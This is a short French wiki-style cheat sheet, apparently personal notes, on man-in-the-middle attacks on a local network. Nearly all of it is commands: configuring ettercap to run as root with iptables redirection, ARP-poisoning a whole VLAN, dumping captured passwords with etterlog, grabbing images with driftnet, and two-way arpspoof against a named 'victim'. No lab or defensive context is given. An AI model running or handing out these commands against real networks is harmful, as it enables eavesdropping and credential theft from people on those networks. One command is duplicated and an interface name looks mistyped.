MITM attacks
Aller à la navigation
Aller à la recherche
Ettercap
Edit /etc/ettercap/etter.conf
Mettre à la place de la valeur par défaut
ec_uid = 0 ec_gid = 0
Et decommenter
# if you use iptables: # redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" # redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Capture tout le VLAN (bourrin)
# ettercap -T -M arp -L dump ////
Pour logger
# ettercap -T -M arp -L dump ////
Utiliser etterlog pour parser les logs
# etterlog -p dump.eci (affiche les mot de passes)
Pour récupérer les images
# driftnet -i etho
arpspoof
# arpspoof -i interface -t IP.DU.ROUTEUR IP.DE.LA.VICTIME
On inverse l'operation dans un autre shell en même temps :
# arpspoof -i interface -t IP.DE.LA.VICTIME IP.DU.ROUTEUR